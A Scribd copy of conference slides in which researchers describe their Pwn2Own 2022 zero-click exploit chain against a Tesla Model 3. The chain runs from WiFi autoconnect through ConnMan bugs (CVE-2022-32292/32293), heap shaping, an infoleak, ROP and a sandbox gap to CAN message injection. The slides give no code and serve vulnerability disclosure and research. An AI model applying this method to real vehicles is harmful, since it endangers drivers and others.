Scribd
Upload
363 views58 pages

Tesla Hexacon

The document discusses potential attack vectors for exploiting vulnerabilities in a Tesla Model 3. It analyzes various interfaces and components in the vehicle, including WiFi, Bluetooth, LTE, and internal networks. The document proposes targeting the autoconnect WiFi feature as an attack vector, as it provides additional attack surface in the infotainment system's WiFi stack, network stack, and applications using internet connectivity. This could allow for remote code execution without user interaction, fulfilling the requirements for the top Pwn2own prize of winning the vehicle.

Uploaded by

CruizByte Mobility Solutions Private Limited
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
363 views58 pages

Tesla Hexacon

The document discusses potential attack vectors for exploiting vulnerabilities in a Tesla Model 3. It analyzes various interfaces and components in the vehicle, including WiFi, Bluetooth, LTE, and internal networks. The document proposes targeting the autoconnect WiFi feature as an attack vector, as it provides additional attack surface in the infotainment system's WiFi stack, network stack, and applications using internet connectivity. This could allow for remote code execution without user interaction, fulfilling the requirements for the top Pwn2own prize of winning the vehicle.

Uploaded by

CruizByte Mobility Solutions Private Limited
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 58

1

I feel a draft. Opening the doors and windows


0-click RCE on the Tesla Model3
Who are we
2

David BERARD Vincent DEHORS


SECURITY EXPERT SECURITY EXPERT
@_p0ly_ @vdehors
Pwn2own
3

Vancouver 2022

Competition organized by ZDI

Announced on January 12 2022

Took place at Vancouver mid may 2022

Many desktop and server software as


target, and the Tesla Model 3/S
Pwn2own
4

Tesla Rules

Initial vector Intermediate Pivot Final stage


Tuner Infotainment VCSEC
WiFi chipset Gateway
Bluetooth chipset Autopilot
Modem

Tier 3 : Only 1 system compromised


Tier 2 : 2 systems compromised and go right in the diagram above
Tier 1 : Full chain, 3 system compromised from initial vector to final stage

Tier 1 & 2 : Possibility to win the car


Model 3 – ICE Architecture
5

Hardware

Same enclosure for infotainment & autopilot


~400$ on eBay
Model 3 – ICE Architecture
6

Interfaces
Model 3 – ICE Architecture
7

Interfaces

WiFi
Model 3 – ICE Architecture
8

Interfaces

Bluetooth
Model 3 – ICE Architecture
9

Interfaces

LTE
Model 3 – ICE Architecture
10

Interfaces

DIAG
Model 3 – ICE Architecture
11

Interfaces
CAN & POWER
Model 3 – ICE Architecture
12

Hardware
Model 3 – ICE Architecture
13

Hardware
SoC: Intel Atom A3950
Model 3 – ICE Architecture
14

Hardware

SPI FLASH
Model 3 – ICE Architecture
15

Hardware

eMMC
Model 3 – ICE Architecture
16

Hardware

WiFi/BT bcm4359
Model 3 – ICE Architecture
17

Hardware
Gateway: SPC5748GS
Model 3 – ICE Architecture
18

Hardware

SDCARD
Model 3 – ICE Architecture
19

Software

Infotainment
Gateway

X64 Intel Atom PowerPC e200 in VLE mode

OS: Linux 4.14 OS: based on FreeRTOS

Highly customized buildroot


system

Boots on eMMC / SPI Boots on internal flash /


SDcard / tftp
Model 3 – ICE Architecture
20

Ethernet Network

Ethernet switch

management

ETHERNET
ETHERNET

ETHERNET

ETHERNET

ETHERNET
Infotainment Gateway Autopilots
LTE TUNER
Connectivity ECU
card DABHD/FM
PCIE

WIFI/BT CHIP
BCM4359
Model 3 – ICE Resources
21

Leak
Model 3 – ICE Resources
22

Leak

Tesla Internal documentation


Model 3 – ICE Resources
23

Leak

2019.20.4.2 squashfs (rootfs)


Model 3 – ICE dump
24

eMMC pinout

Thanks again @lewurm


eMMC Dump
25

Strategy

Force boot on SPI


1 If the eMMC is not readable, the CPU boots on SPI flash
and eMMC is still powered
Ø Force eMMC failure by shorting eMMC CMD signal

Connect SBC (BeagleBone B) SDIO channel


2 Linux detects eMMC card
Can be dumped or written with dd or other tools
Ø Linux mmc driver has to be patched to slow down the
communication as our setup does not support high
frequencies

Disconnect SBC and reboot the ICE


3 Use of short wires let the ICE boots on eMMC in HS400
mode without perturbation
Firmware
26

History access to firmwares

Tesla Tesla
Leak
2019.20.4.2 via ZDI via ZDI
2021.44.30.7 2022.12.22
16 Apr 2021 Pwn2own
7 Feb 2022 29 Apr 2022

Tesla
Dump
2020.48.35.5 via ZDI
2022.8.2
16 Jun 2021
29 Mar 2022
Attack vectors
27

Objectives
Ethernet switch
We want a RCE without any user interaction

ETHERNET
ETHERNET

ETHERNET

management
Bonus: fits the pwn2own rules to allow a Tier 1(2) entry

ETHERNET

ETHERNET
Possible targets
LTE connectivity card
Infotainment Gateway Autopilots
Two systems are hosted on the LTE card: the baseband LTE TUNER
Connectivi ECU
and a Linux system => 2 hops to the Infotainment ty card DABHD/FM
Tuner ECU

PCIE
ECU required
1 hop to the Infotainment
WIFI/BT
WiFi/BT chipset CHIP
BCM4359
Directly attached in PCIe to the Infotainment
No vulnerability found in firmware

Infotainment system (Kernel WiFi/BT stacks & network management stack)


Directly on the target
Limited attack surface & Not valid for Tier1 entry
Attack vector
28

Autoconnect WiFi

Infotainment target additional attack surface


Full Kernel WiFi stack

Kernel Network stack

Network manager’s (ConnMan) additional surface

Applications that use Internet connection (i.e. VPN client)


Public research
29

We could have named this presentation: TBONE 2.0


Tooling
30

Emulator with WiFi connection

VM Kernel RootFS Network


Use Qemu to run the Use kernel config Patch some init scripts USB passthrough on WiFi dongle
ICE software from the firmware and Add Xorg drivers TAP interface for internal network
add Qemu required Add WiFi firmware Gateway simulator in Python
options Add SSH root access
31

ConnMan
Network manager

OpenSource code

Used on Linux based embeded devices

DHCP DNS WISPR Plugins


IPv4 network config Client and proxy Portal detection Work with others services
Wifi, Ethernet, Bluetooth, Ofono
ConnMan
32

Opensource Connection Manager

Dbus Communication
IPC All communication with other services goes through the dbus
server. A custom Tesla UI program manages Connman with its
dbus interface and displays the current connection status on the
Infotainment’s screen

Glib
LIB Connman is written in C and uses a lot of Glib feature :
l Glib event loop (application mono thread)
l Utilities (strings, hashtable, I/Os)
l A few allocations use the glib allocator

Gweb / Gresolv
MODULE Connman implementation of HTTP and DNS protocols :
l Gweb : custom implementation of HTTP (GET/POST queries)
l Gresolv : sends a DNS query and handles the response
ConnMan Surface
33

Limited attack surface

DHCP IPv6
IPv4 DHCP implementation Disabled in the kernel configuration
Few bugs already discovered and patched

WISPR DNS Proxy


Portal detection and connectivity check Replaced by DNSMasq

WPAD NTP
Proxy script handling, disabled during an update Disabled by the Tesla UI application

Wifi wpa_supplicant Ofono


Small surface from the WiFi: only some user controlled Small surface from the connectivity card data.
input (network SSIDs, passphrase, states, ...)
WiFi management
34

How the Tesla connects to a Wifi AP

1 2 3 4 5

Known
Scan Auth. DHCP WISPR
Network
A WiFi scan is 1. User network 802.11 auth. 1. Discover req. HTTP GET
performed 2. Tesla Service 2. Request req. request
periodically or on
UI request
WISPR
35

Wispers a payload directly to the Tesla


Vulnerabilities
36

Vulnerabilities we found in the remote surface (Connman)

OOB byte swap in GWEB (CVE-2022-32292)


n Bug in the HTTP parsing function
n Allows changing a 0x0A byte into a 0x00 byte after the end of an allocation
n Difficult to exploit without an infoleak

Double free in WISPR (CVE-2022-32293)

n Only used to crash Connman quickly, to start with a clean heap after a restart of the service
n We only saw the exploitability of this bug at the end !
OOB byte swap
37

One bug sufficient to get RCE


Allocation spray
38

Based on g_hash_table insertion/replacement

Advantages Disadvantages
l Controlled size of the new allocation l Allocation kept only during the HTTP session
l Content partially controlled l Bad characters in the content: 0x00 and 0x0A
l The allocation can be freed by adding new content to the same header but l Triggers other allocations/free
a new one (bigger) is made at the same time
Chaining requests
39

Useful exploitation primitive

Heap shaping kept Vulnerable buffer placement


The first heap shaping remains until the end of the second WISPR The vulnerable buffer is allocated before the HTTP request is sent but the one for WISPR
request #2 can be placed with the spray of WISPR #1
Heap shaping
40

1 Resize internal buffers

2 Fill existing holes and tcache

3 Allocate chunks for hole placement

4 Grow chunks to create holes (> 0x810)

Allocation after the OOB is controlled

Resilient to unexpected allocations by


using dedicated sizes. Any other chunk
sizes land on different holes
Exploiting the bug
41

How to transform a byte swap into a chunk takeover

Byte swap Double ref Arbitrary chunk takeover


Infoleak
42

From chunk takeover to libc pointer


Infoleak
43

Getting an infoleak... 4 times


Infoleak
44

Patching the DHCP hostname string

DHCP Renew is broken in Connman even in normal operation,


because of a Tesla commit
Infoleak
45

Patching the DHCP hostname string

Leak
Known libc pointer (until first null
byte)
Code execution
46

One shot code execution

Same method as for the leak One arbitrary write


1 The same action are performed another time to get another double 2 Known (and simple) technique to get arbitrary write from libc
reference on a controlled chunk metadata corruption: tcache poisoining
https://github.com/shellphish/how2heap

Libc hook patched Reallocate a buffer


3 The well known realloc_hook is patched to target a gadget inside a 4 A lot of data is sent to the receiving buffer which will trigger a
library realloc() inside the glib while resizing it. The first argument targets
controlled memory.

Stack pivot + ROP


5 One gadget is used to set the stack in the controlled buffer and
then a ROP chain is executed
Code execution
47

One shot code execution

But...

Tesla updated the libc from 2.29 to 2.34

2 weeks before the contest

One arbitrary write


Tcache poisoning needs an additional infoleak

Libc hook patched


Libc hooks have been removed
Code execution (2)
49

Execution flow hijacking


Stager
50

Code injection
Sandboxes
51

Restricted code execution


Network
52

A hole in the sandboxing


Raw socket
53

Packet injection

Ethernet switch

UDP 4321

ETHERNET

ETHERNET

management
ETH0

CAN Proxy
CONNMAN & filter Other ECUs
CAN NETWORKS

Infotainment Gateway
CAN messages
54

Construct messages

Partial CAN database available online libQtCarCANData.so.1.0.0


https://github.com/joshwardell/model3dbc contains all information for messages decoding
CAN messages
55

Construct messages
Raw socket
56

Packet injection
Demo
57

This was our first attempt on a real car


Fixes
58

Connman & Kernel

Connman : CVE-2022-32293

Connman : CVE-2022-32292

Kernel : CVE-2022-42430 Kernel : CVE-2022-42431


Conclusion
59

Long work: almost 1 year


Back to non-trival vulnerability after long vulnerability research
Working in parallel of updates made us rewrite the exploit multiple times

Many help from ZDI and Tesla at the end


Tesla provided us an ECU that can receive updates
ZDI and Tesla give us updates
Version freeze 2 weeks before the event
Thanks to them

Was fun

We didn’t win the car L even if the impact is the same as some Tier2 entries

You might also like